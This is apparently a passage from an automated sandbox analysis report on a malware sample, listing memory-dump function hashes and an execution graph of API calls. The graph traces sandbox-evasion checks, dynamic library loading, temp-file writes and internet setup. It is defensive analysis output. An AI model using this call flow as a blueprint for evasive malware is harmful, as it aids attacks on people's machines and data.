                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ed577c5bfe9a26f7266e0aa0d2dadf227830c1585dec7efec1881a81f2da417e
                                                                                                                  • Instruction ID: b326f6ef6e86c575cdb61b115c897822954846e916fe7590565bfc5d7e876c9d
                                                                                                                  • Opcode Fuzzy Hash: ed577c5bfe9a26f7266e0aa0d2dadf227830c1585dec7efec1881a81f2da417e
                                                                                                                  • Instruction Fuzzy Hash: B2F05420756A0A4FDB55EB6C94D9A6037D1FF583017850275D90CCB2B1DA24D885C790
                                                                                                                  Function 00007FFD9B7F5ECD Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9508ba6d2d1b9c00782302115d7b39487b43babbaa502e47b0e0df93984fc09
                                                                                                                  • Instruction ID: 6b2a1fccdfbec1cb395c984b6a51a625b5e08805ade61ebb2e8b0b0dc2795f81
                                                                                                                  • Opcode Fuzzy Hash: b9508ba6d2d1b9c00782302115d7b39487b43babbaa502e47b0e0df93984fc09
                                                                                                                  • Instruction Fuzzy Hash: 4AF0F671E0DA8D0FE751D76888A80ECBFE0FF51200F4501F7D498C60B2DD251A558381
                                                                                                                  Function 00007FFD9B7F08CD Relevance: .0, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d51fbfb611d9466b2023cb245b07bae436cca3ccd0878e15b8da0e4e84835135
                                                                                                                  • Instruction ID: ee564387425dd6d1fde4d0b0dbc2ab86c00e8715091841eeae9adb64102c788d
                                                                                                                  • Opcode Fuzzy Hash: d51fbfb611d9466b2023cb245b07bae436cca3ccd0878e15b8da0e4e84835135
                                                                                                                  • Instruction Fuzzy Hash: DCF03751F1FB594FD6B5AA6C04751787E91EF45A1074601EED449C72F3D9441D0443C6
                                                                                                                  Function 00007FFD9B7F6DF8 Relevance: .0, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab5ab02a2797f9c17b2ea6afd37bea16c7fddf6d379d04e0d691a97f2d7e4531
                                                                                                                  • Instruction ID: 389b3733dfa86e2969fdd65980457738c793a370cf3f486243169f1513552785
                                                                                                                  • Opcode Fuzzy Hash: ab5ab02a2797f9c17b2ea6afd37bea16c7fddf6d379d04e0d691a97f2d7e4531
                                                                                                                  • Instruction Fuzzy Hash: 79F01C34F1961A8FDB29EB54C895AACB7B5FF58300F1142E4D01C972A6CE34BA84CB55
                                                                                                                  Function 00007FFD9B7F125E Relevance: .0, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0d45a0f523be18a7d3eb1f73a4e511aa31797e044e48b6527ca044c07b1d5ad6
                                                                                                                  • Instruction ID: ac7700d4ef5b53eccda48774ba7e27e2c886f93bd20c2a66a9e5dbe62ed379b6
                                                                                                                  • Opcode Fuzzy Hash: 0d45a0f523be18a7d3eb1f73a4e511aa31797e044e48b6527ca044c07b1d5ad6
                                                                                                                  • Instruction Fuzzy Hash: D8D0A7A1B55E4E17D654A57404968E9B391EF50700F010574F11B831A6CD14B5044244
                                                                                                                  Function 00007FFD9B7F14EE Relevance: .0, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 43a40329cbb4c2e07e7b93cd3ce94f196bbe30fb6e3ee3b18f620012d179f3d4
                                                                                                                  • Instruction ID: 6b9bf3b812fc3962a3daf0c304b901b14e02f93185eb9ce0eca5881bf763c812
                                                                                                                  • Opcode Fuzzy Hash: 43a40329cbb4c2e07e7b93cd3ce94f196bbe30fb6e3ee3b18f620012d179f3d4
                                                                                                                  • Instruction Fuzzy Hash: 9AD0A756B15A460BD754A96400E69E5A391EF54300F031175A10F832A7CD1879458140
                                                                                                                  Function 00007FFD9B7F11E3 Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e8af388e35448779c241a906c5638141a0d15d669f6d8bcff277105aaa33fb0
                                                                                                                  • Instruction ID: 218211e48cd1dbea70c44e65fbab7ef5b327d53664135f1dd3ceef977e151b89
                                                                                                                  • Opcode Fuzzy Hash: 5e8af388e35448779c241a906c5638141a0d15d669f6d8bcff277105aaa33fb0
                                                                                                                  • Instruction Fuzzy Hash: FBD0A7A3B1ADC65FE7A5AA7050269E9BFA0DF90340B420A7FD05F815A7DD2466444280
                                                                                                                  Function 00007FFD9B7F120C Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 140a0c9a9b8c9b67344f79122610f330a4b8fa8b56860bfa27bae01ba81d06a4
                                                                                                                  • Instruction ID: 9f9e10380e6fd6f6c10b1700ee36b14d7b75e333c4b599c56bbf531d6454d009
                                                                                                                  • Opcode Fuzzy Hash: 140a0c9a9b8c9b67344f79122610f330a4b8fa8b56860bfa27bae01ba81d06a4
                                                                                                                  • Instruction Fuzzy Hash: DBD0A7B2F16E4A9FE695AA7040624E9B2A0FF54300F01057EE04F821A3DD286D008680

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:94.4%
                                                                                                                  Signature Coverage:3.8%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:30
                                                                                                                  execution_graph 90658 6c66b694 90659 6c66b6a0 ___scrt_is_nonwritable_in_current_image 90658->90659 90688 6c66af2a 90659->90688 90661 6c66b6a7 90662 6c66b796 90661->90662 90663 6c66b6d1 90661->90663 90666 6c66b6ac ___scrt_is_nonwritable_in_current_image 90661->90666 90705 6c66b1f7 IsProcessorFeaturePresent 90662->90705 90692 6c66b064 90663->90692 90667 6c66b6e0 __RTC_Initialize 90667->90666 90695 6c66bf89 InitializeSListHead 90667->90695 90669 6c66b7b3 ___scrt_uninitialize_crt __RTC_Initialize 90670 6c66b6ee ___scrt_initialize_default_local_stdio_options 90672 6c66b6f3 _initterm_e 90670->90672 90671 6c66b79d ___scrt_is_nonwritable_in_current_image 90671->90669 90673 6c66b7d2 90671->90673 90674 6c66b828 90671->90674 90672->90666 90676 6c66b708 90672->90676 90709 6c66b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 90673->90709 90677 6c66b1f7 ___scrt_fastfail 6 API calls 90674->90677 90696 6c66b072 90676->90696 90678 6c66b82f 90677->90678 90684 6c66b86e dllmain_crt_process_detach 90678->90684 90685 6c66b83b 90678->90685 90680 6c66b7d7 90710 6c66bf95 __std_type_info_destroy_list 90680->90710 90682 6c66b70d 90682->90666 90683 6c66b711 _initterm 90682->90683 90683->90666 90687 6c66b840 90684->90687 90686 6c66b860 dllmain_crt_process_attach 90685->90686 90685->90687 90686->90687 90689 6c66af33 90688->90689 90711 6c66b341 IsProcessorFeaturePresent 90689->90711 90691 6c66af3f ___scrt_uninitialize_crt 90691->90661 90712 6c66af8b 90692->90712 90694 6c66b06b 90694->90667 90695->90670 90697 6c66b077 ___scrt_release_startup_lock 90696->90697 90698 6c66b082 90697->90698 90699 6c66b07b 90697->90699 90702 6c66b087 _configure_narrow_argv 90698->90702 90722 6c66b341 IsProcessorFeaturePresent 90699->90722 90701 6c66b080 90701->90682 90703 6c66b095 _initialize_narrow_environment 90702->90703 90704 6c66b092 90702->90704 90703->90701 90704->90682 90706 6c66b20c ___scrt_fastfail 90705->90706 90707 6c66b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 90706->90707 90708 6c66b302 ___scrt_fastfail 90707->90708 90708->90671 90709->90680 90710->90669 90711->90691 90713 6c66af9e 90712->90713 90714 6c66af9a 90712->90714 90715 6c66b028 90713->90715 90717 6c66afab ___scrt_release_startup_lock 90713->90717 90714->90694 90716 6c66b1f7 ___scrt_fastfail 6 API calls 90715->90716 90719 6c66b02f 90716->90719 90718 6c66afd6 90717->90718 90720 6c66afb8 _initialize_onexit_table 90717->90720 90718->90694 90720->90718 90721 6c66afc7 _initialize_onexit_table 90720->90721 90721->90718 90722->90701 90723 6c633060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 90728 6c66ab2a 90723->90728 90727 6c6330db 90732 6c66ae0c _crt_atexit _register_onexit_function 90728->90732 90730 6c6330cd 90731 6c66b320 5 API calls ___raise_securityfailure 90730->90731 90731->90727 90732->90730 90733 6c6335a0 90734 6c6335c4 InitializeCriticalSectionAndSpinCount getenv 90733->90734 90749 6c633846 __aulldiv 90733->90749 90735 6c6338fc strcmp 90734->90735 90740 6c6335f3 __aulldiv 90734->90740 90737 6c633912 strcmp 90735->90737 90735->90740 90737->90740 90738 6c6335f8 QueryPerformanceFrequency 90738->90740 90739 6c6338f4 90740->90738 90741 6c633622 _strnicmp 90740->90741 90743 6c633944 _strnicmp 90740->90743 90745 6c63375c 90740->90745 90746 6c63395d 90740->90746 90747 6c633664 GetSystemTimeAdjustment 90740->90747 90741->90740 90741->90743 90742 6c63376a QueryPerformanceCounter EnterCriticalSection 90744 6c6337b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 90742->90744 90742->90745 90743->90740 90743->90746 90744->90745 90748 6c6337fc LeaveCriticalSection 90744->90748 90745->90742 90745->90744 90745->90748 90745->90749 90747->90740 90748->90745 90748->90749 90750 6c66b320 5 API calls ___raise_securityfailure 90749->90750 90750->90739 90751 6c64c930 GetSystemInfo VirtualAlloc 90752 6c64c9a3 GetSystemInfo 90751->90752 90753 6c64c973 90751->90753 90755 6c64c9b6 90752->90755 90756 6c64c9d0 90752->90756 90767 6c66b320 5 API calls ___raise_securityfailure 90753->90767 90755->90756 90759 6c64c9bd 90755->90759 90756->90753 90757 6c64c9d8 VirtualAlloc 90756->90757 90760 6c64c9f0 90757->90760 90761 6c64c9ec 90757->90761 90758 6c64c99b 90759->90753 90762 6c64c9c1 VirtualFree 90759->90762 90768 6c66cbe8 GetCurrentProcess TerminateProcess 90760->90768 90761->90753 90762->90753 90767->90758 90769 6c66b830 90770 6c66b86e dllmain_crt_process_detach 90769->90770 90771 6c66b83b 90769->90771 90773 6c66b840 90770->90773 90772 6c66b860 dllmain_crt_process_attach 90771->90772 90771->90773 90772->90773 90774 6c66b9c0 90775 6c66b9ce dllmain_dispatch 90774->90775 90776 6c66b9c9 90774->90776 90778 6c66bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 90776->90778 90778->90775 90779 6c66b8ae 90780 6c66b8ba ___scrt_is_nonwritable_in_current_image 90779->90780 90781 6c66b8e3 dllmain_raw 90780->90781 90782 6c66b8c9 90780->90782 90783 6c66b8de 90780->90783 90781->90782 90784 6c66b8fd dllmain_crt_dispatch 90781->90784 90792 6c64bed0 DisableThreadLibraryCalls LoadLibraryExW 90783->90792 90784->90782 90784->90783 90786 6c66b91e 90787 6c66b94a 90786->90787 90793 6c64bed0 DisableThreadLibraryCalls LoadLibraryExW 90786->90793 90787->90782 90788 6c66b953 dllmain_crt_dispatch 90787->90788 90788->90782 90790 6c66b966 dllmain_raw 90788->90790 90790->90782 90791 6c66b936 dllmain_crt_dispatch dllmain_raw 90791->90787 90792->90786 90793->90791 90794 41848d 90795 418494 90794->90795 90798 41d016 90795->90798 90797 4184a9 90799 41d020 IsDebuggerPresent 90798->90799 90800 41d01e 90798->90800 90806 41d975 90799->90806 90800->90797 90803 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 90804 41d485 GetCurrentProcess TerminateProcess 90803->90804 90805 41d47d __call_reportfault 90803->90805 90804->90797 90805->90804 90806->90803 90807 4184ae 90808 4184b0 90807->90808 90859 402b68 90808->90859 90817 401284 25 API calls 90818 4184df 90817->90818 90819 401284 25 API calls 90818->90819 90820 4184e9 90819->90820 90974 40148a GetPEB 90820->90974 90822 4184f3 90823 401284 25 API calls 90822->90823 90824 4184fd 90823->90824 90825 401284 25 API calls 90824->90825 90826 418507 90825->90826 90827 401284 25 API calls 90826->90827 90828 418511 90827->90828 90975 4014a2 GetPEB 90828->90975 90830 41851b 90831 401284 25 API calls 90830->90831 90832 418525 90831->90832 90833 401284 25 API calls 90832->90833 90834 41852f 90833->90834 90835 401284 25 API calls 90834->90835 90836 418539 90835->90836 90976 4014f9 90836->90976 90839 401284 25 API calls 90840 41854d 90839->90840 90841 401284 25 API calls 90840->90841 90842 418557 90841->90842 90843 401284 25 API calls 90842->90843 90844 418561 90843->90844 90999 401666 GetTempPathW 90844->90999 90847 401284 25 API calls 90848 418570 90847->90848 90849 401284 25 API calls 90848->90849 90850 41857a 90849->90850 90851 401284 25 API calls 90850->90851 90852 418584 90851->90852 91011 417041 90852->91011 91436 4047e8 GetProcessHeap HeapAlloc 90859->91436 90862 4047e8 3 API calls 90863 402b93 90862->90863 90864 4047e8 3 API calls 90863->90864 90865 402bac 90864->90865 90866 4047e8 3 API calls 90865->90866 90867 402bc3 90866->90867 90868 4047e8 3 API calls 90867->90868 90869 402bda 90868->90869 90870 4047e8 3 API calls 90869->90870 90871 402bf0 90870->90871 90872 4047e8 3 API calls 90871->90872 90873 402c07 90872->90873 90874 4047e8 3 API calls 90873->90874 90875 402c1e 90874->90875 90876 4047e8 3 API calls 90875->90876 90877 402c38 90876->90877 90878 4047e8 3 API calls 90877->90878 90879 402c4f 90878->90879 90880 4047e8 3 API calls 90879->90880 90881 402c66 90880->90881 90882 4047e8 3 API calls 90881->90882 90883 402c7d 90882->90883 90884 4047e8 3 API calls 90883->90884 90885 402c93 90884->90885 90886 4047e8 3 API calls 90885->90886 90887 402caa 90886->90887 90888 4047e8 3 API calls 90887->90888 90889 402cc1 90888->90889 90890 4047e8 3 API calls 90889->90890 90891 402cd8 90890->90891 90892 4047e8 3 API calls 90891->90892 90893 402cf2 90892->90893 90894 4047e8 3 API calls 90893->90894 90895 402d09 90894->90895 90896 4047e8 3 API calls 90895->90896 90897 402d20 90896->90897 90898 4047e8 3 API calls 90897->90898 90899 402d37 90898->90899 90900 4047e8 3 API calls 90899->90900 90901 402d4e 90900->90901 90902 4047e8 3 API calls 90901->90902 90903 402d65 90902->90903 90904 4047e8 3 API calls 90903->90904 90905 402d7c 90904->90905 90906 4047e8 3 API calls 90905->90906 90907 402d92 90906->90907 90908 4047e8 3 API calls 90907->90908 90909 402dac 90908->90909 90910 4047e8 3 API calls 90909->90910 90911 402dc3 90910->90911 90912 4047e8 3 API calls 90911->90912 90913 402dda 90912->90913 90914 4047e8 3 API calls 90913->90914 90915 402df1 90914->90915 90916 4047e8 3 API calls 90915->90916 90917 402e07 90916->90917 90918 4047e8 3 API calls 90917->90918 90919 402e1e 90918->90919 90920 4047e8 3 API calls 90919->90920 90921 402e35 90920->90921 90922 4047e8 3 API calls 90921->90922 90923 402e4c 90922->90923 90924 4047e8 3 API calls 90923->90924 90925 402e66 90924->90925 90926 4047e8 3 API calls 90925->90926 90927 402e7d 90926->90927 90928 4047e8 3 API calls 90927->90928 90929 402e94 90928->90929 90930 4047e8 3 API calls 90929->90930 90931 402eaa 90930->90931 90932 4047e8 3 API calls 90931->90932 90933 402ec1 90932->90933 90934 4047e8 3 API calls 90933->90934 90935 402ed8 90934->90935 90936 4047e8 3 API calls 90935->90936 90937 402eec 90936->90937 90938 4047e8 3 API calls 90937->90938 90939 402f03 90938->90939 90940 418643 90939->90940 91440 41859a GetPEB 90940->91440 90942 418649 90943 418844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 90942->90943 90944 418659 90942->90944 90945 4188a3 GetProcAddress 90943->90945 90946 4188b5 90943->90946 90953 418673 20 API calls 90944->90953 90945->90946 90947 4188e7 90946->90947 90948 4188be GetProcAddress GetProcAddress 90946->90948 90949 4188f0 GetProcAddress 90947->90949 90950 418902 90947->90950 90948->90947 90949->90950 90951 41890b GetProcAddress 90950->90951 90952 41891d 90950->90952 90951->90952 90954 418926 GetProcAddress GetProcAddress 90952->90954 90955 4184c1 90952->90955 90953->90943 90954->90955 90956 4010f0 GetCurrentProcess VirtualAllocExNuma 90955->90956 90957 401111 ExitProcess 90956->90957 90958 401098 VirtualAlloc 90956->90958 90961 4010b8 _memset 90958->90961 90960 4010ec 90963 401284 90960->90963 90961->90960 90962 4010d5 VirtualFree 90961->90962 90962->90960 90964 4012ac _memset 90963->90964 90965 4012bb 13 API calls 90964->90965 91441 410c85 GetProcessHeap RtlAllocateHeap GetComputerNameA 90965->91441 90967 4013e9 90970 41d016 setSBUpLow 5 API calls 90967->90970 90971 4013f4 90970->90971 90971->90817 90972 4013b9 90972->90967 90973 4013e2 ExitProcess 90972->90973 90974->90822 90975->90830 91444 4014ad GetPEB 90976->91444 90979 4014ad 2 API calls 90980 401516 90979->90980 90981 4014ad 2 API calls 90980->90981 90998 4015a1 90980->90998 90982 401529 90981->90982 90983 4014ad 2 API calls 90982->90983 90982->90998 90984 401538 90983->90984 90985 4014ad 2 API calls 90984->90985 90984->90998 90986 401547 90985->90986 90987 4014ad 2 API calls 90986->90987 90986->90998 90988 401556 90987->90988 90989 4014ad 2 API calls 90988->90989 90988->90998 90990 401565 90989->90990 90991 4014ad 2 API calls 90990->90991 90990->90998 90992 401574 90991->90992 90993 4014ad 2 API calls 90992->90993 90992->90998 90994 401583 90993->90994 90995 4014ad 2 API calls 90994->90995 90994->90998 90996 401592 90995->90996 90997 4014ad 2 API calls 90996->90997 90996->90998 90997->90998 90998->90839 91000 4016a4 wsprintfW 90999->91000 91010 4017f7 90999->91010 91001 4016d0 CreateFileW 91000->91001 91003 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 91001->91003 91001->91010 91002 41d016 setSBUpLow 5 API calls 91004 401807 91002->91004 91006 401754 _memset 91003->91006 91004->90847 91005 401733 WriteFile 91005->91006 91005->91010 91006->91005 91007 401768 CloseHandle CreateFileW 91006->91007 91009 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 91006->91009 91006->91010 91008 40179e ReadFile 91007->91008 91007->91010 91008->91006 91008->91010 91009->91001 91009->91010 91010->91002 91012 417051 91011->91012 91448 4104e7 91012->91448 91016 417080 91453 410609 lstrlenA 91016->91453 91019 410609 3 API calls 91020 4170a5 91019->91020 91021 410609 3 API calls 91020->91021 91022 4170ae 91021->91022 91457 41058d 91022->91457 91024 4170ba 91025 4170e3 OpenEventA 91024->91025 91026 4170f6 CreateEventA 91025->91026 91027 4170dc CloseHandle 91025->91027 91028 4104e7 lstrcpyA 91026->91028 91027->91025 91029 41711e 91028->91029 91461 410549 lstrlenA 91029->91461 91032 410549 2 API calls 91033 417185 91032->91033 91465 402f12 91033->91465 91036 418950 121 API calls 91037 4172ca 91036->91037 91039 4104e7 lstrcpyA 91037->91039 91243 41757f 91037->91243 91041 4172e5 91039->91041 91043 410609 3 API calls 91041->91043 91042 41058d lstrcpyA 91044 4175af 91042->91044 91045 4172f7 91043->91045 91048 4104e7 lstrcpyA 91044->91048 91046 41058d lstrcpyA 91045->91046 91047 417300 91046->91047 91050 410609 3 API calls 91047->91050 91049 4175c6 91048->91049 91051 410609 3 API calls 91049->91051 91052 41731b 91050->91052 91053 4175d9 91051->91053 91054 41058d lstrcpyA 91052->91054 92037 4105c7 91053->92037 91056 417324 91054->91056 91059 410609 3 API calls 91056->91059 91058 41058d lstrcpyA 91061 4175f2 91058->91061 91060 41733f 91059->91060 91062 41058d lstrcpyA 91060->91062 91063 417604 CreateDirectoryA 91061->91063 91064 417348 91062->91064 92041 401cfd 91063->92041 91067 410609 3 API calls 91064->91067 91069 417363 91067->91069 91071 41058d lstrcpyA 91069->91071 91070 41762e 92125 41824d 91070->92125 91073 41736c 91071->91073 91075 410609 3 API calls 91073->91075 91074 41763f 91076 41058d lstrcpyA 91074->91076 91077 417387 91075->91077 91078 417656 91076->91078 91079 41058d lstrcpyA 91077->91079 91080 41058d lstrcpyA 91078->91080 91081 417390 91079->91081 91082 417666 91080->91082 91086 410609 3 API calls 91081->91086 92132 410519 91082->92132 91085 410609 3 API calls 91087 417685 91085->91087 91088 4173ab 91086->91088 91089 41058d lstrcpyA 91087->91089 91090 41058d lstrcpyA 91088->91090 91091 41768e 91089->91091 91092 4173b4 91090->91092 91094 4105c7 2 API calls 91091->91094 91093 410609 3 API calls 91092->91093 91095 4173cf 91093->91095 91096 4176ab 91094->91096 91097 41058d lstrcpyA 91095->91097 91098 41058d lstrcpyA 91096->91098 91099 4173d8 91097->91099 91100 4176b4 91098->91100 91102 410609 3 API calls 91099->91102 91101 4176bd InternetOpenA InternetOpenA 91100->91101 91103 410519 lstrcpyA 91101->91103 91104 4173f3 91102->91104 91105 417707 91103->91105 91107 41058d lstrcpyA 91104->91107 91106 4104e7 lstrcpyA 91105->91106 91108 417716 91106->91108 91109 4173fc 91107->91109 92136 4109a2 GetWindowsDirectoryA 91108->92136 91113 410609 3 API calls 91109->91113 91112 410519 lstrcpyA 91114 417731 91112->91114 91115 417417 91113->91115 92154 404b2e 91114->92154 91116 41058d lstrcpyA 91115->91116 91118 417420 91116->91118 91122 410609 3 API calls 91118->91122 91121 417744 91124 4104e7 lstrcpyA 91121->91124 91123 41743b 91122->91123 91125 41058d lstrcpyA 91123->91125 91126 417779 91124->91126 91127 417444 91125->91127 91128 401cfd lstrcpyA 91126->91128 91132 410609 3 API calls 91127->91132 91129 41778a 91128->91129 92304 405f39 91129->92304 91134 41745f 91132->91134 91136 41058d lstrcpyA 91134->91136 91135 4177a2 91137 4104e7 lstrcpyA 91135->91137 91138 417468 91136->91138 91139 4177b6 91137->91139 91141 410609 3 API calls 91138->91141 91140 401cfd lstrcpyA 91139->91140 91142 4177c0 91140->91142 91143 417483 91141->91143 91144 405f39 43 API calls 91142->91144 91145 41058d lstrcpyA 91143->91145 91146 4177cc 91144->91146 91147 41748c 91145->91147 92477 413259 strtok_s 91146->92477 91151 410609 3 API calls 91147->91151 91149 4177df 91150 4104e7 lstrcpyA 91149->91150 91152 4177f2 91150->91152 91153 4174a7 91151->91153 91154 401cfd lstrcpyA 91152->91154 91155 41058d lstrcpyA 91153->91155 91156 417803 91154->91156 91158 4174b0 91155->91158 91157 405f39 43 API calls 91156->91157 91159 41780f 91157->91159 91162 410609 3 API calls 91158->91162 92486 413390 strtok_s 91159->92486 91161 417822 91163 401cfd lstrcpyA 91161->91163 91164 4174cb 91162->91164 91165 417833 91163->91165 91166 41058d lstrcpyA 91164->91166 92493 413b86 91165->92493 91168 4174d4 91166->91168 91171 410609 3 API calls 91168->91171 91173 4174ef 91171->91173 91175 41058d lstrcpyA 91173->91175 91177 4174f8 91175->91177 91181 410609 3 API calls 91177->91181 91184 417513 91181->91184 91186 41058d lstrcpyA 91184->91186 91187 41751c 91186->91187 91194 410609 3 API calls 91187->91194 91199 417537 91194->91199 91200 41058d lstrcpyA 91199->91200 91207 417540 91200->91207 91214 410609 3 API calls 91207->91214 91218 41755b 91214->91218 91222 41058d lstrcpyA 91218->91222 91226 417564 91222->91226 92020 41257f 91226->92020 92029 411c4a 91243->92029 91250 41cc6c 10 API calls 91250->91243 91437 402b7c 91436->91437 91438 40480f 91436->91438 91437->90862 91439 404818 lstrlenA 91438->91439 91439->91437 91439->91439 91440->90942 91442 401385 91441->91442 91442->90967 91443 410c53 GetProcessHeap HeapAlloc GetUserNameA 91442->91443 91443->90972 91445 4014e9 91444->91445 91446 4014d9 lstrcmpiW 91445->91446 91447 4014ef 91445->91447 91446->91445 91446->91447 91447->90979 91447->90998 91449 4104f2 91448->91449 91450 410513 91449->91450 91451 410509 lstrcpyA 91449->91451 91452 410c53 GetProcessHeap HeapAlloc GetUserNameA 91450->91452 91451->91450 91452->91016 91455 410630 91453->91455 91454 410656 91454->91019 91455->91454 91456 410643 lstrcpyA lstrcatA 91455->91456 91456->91454 91459 41059c 91457->91459 91458 4105c3 91458->91024 91459->91458 91460 4105bb lstrcpyA 91459->91460 91460->91458 91462 41055e 91461->91462 91463 410587 91462->91463 91464 41057d lstrcpyA 91462->91464 91463->91032 91464->91463 91466 4047e8 3 API calls 91465->91466 91467 402f27 91466->91467 91468 4047e8 3 API calls 91467->91468 91469 402f3e 91468->91469 91470 4047e8 3 API calls 91469->91470 91471 402f55 91470->91471 91472 4047e8 3 API calls 91471->91472 91473 402f6c 91472->91473 91474 4047e8 3 API calls 91473->91474 91475 402f85 91474->91475 91476 4047e8 3 API calls 91475->91476 91477 402f9c 91476->91477 91478 4047e8 3 API calls 91477->91478 91479 402fb3 91478->91479 91480 4047e8 3 API calls 91479->91480 91481 402fca 91480->91481 91482 4047e8 3 API calls 91481->91482 91483 402fe4 91482->91483 91484 4047e8 3 API calls 91483->91484 91485 402ffb 91484->91485 91486 4047e8 3 API calls 91485->91486 91487 403011 91486->91487 91488 4047e8 3 API calls 91487->91488 91489 403028 91488->91489 91490 4047e8 3 API calls 91489->91490 91491 40303f 91490->91491 91492 4047e8 3 API calls 91491->91492 91493 403056 91492->91493 91494 4047e8 3 API calls 91493->91494 91495 40306d 91494->91495 91496 4047e8 3 API calls 91495->91496 91497 403084 91496->91497 91498 4047e8 3 API calls 91497->91498 91499 40309b 91498->91499 91500 4047e8 3 API calls 91499->91500 91501 4030b2 91500->91501 91502 4047e8 3 API calls 91501->91502 91503 4030c9 91502->91503 91504 4047e8 3 API calls 91503->91504 91505 4030df 91504->91505 91506 4047e8 3 API calls 91505->91506 91507 4030f6 91506->91507 91508 4047e8 3 API calls 91507->91508 91509 40310f 91508->91509 91510 4047e8 3 API calls 91509->91510 91511 403123 91510->91511 91512 4047e8 3 API calls 91511->91512 91513 40313a 91512->91513 91514 4047e8 3 API calls 91513->91514 91515 403154 91514->91515 91516 4047e8 3 API calls 91515->91516 91517 40316b 91516->91517 91518 4047e8 3 API calls 91517->91518 91519 403182 91518->91519 91520 4047e8 3 API calls 91519->91520 91521 403199 91520->91521 91522 4047e8 3 API calls 91521->91522 91523 4031af 91522->91523 91524 4047e8 3 API calls 91523->91524 91525 4031c5 91524->91525 91526 4047e8 3 API calls 91525->91526 91527 4031dc 91526->91527 91528 4047e8 3 API calls 91527->91528 91529 4031f2 91528->91529 91530 4047e8 3 API calls 91529->91530 91531 40320c 91530->91531 91532 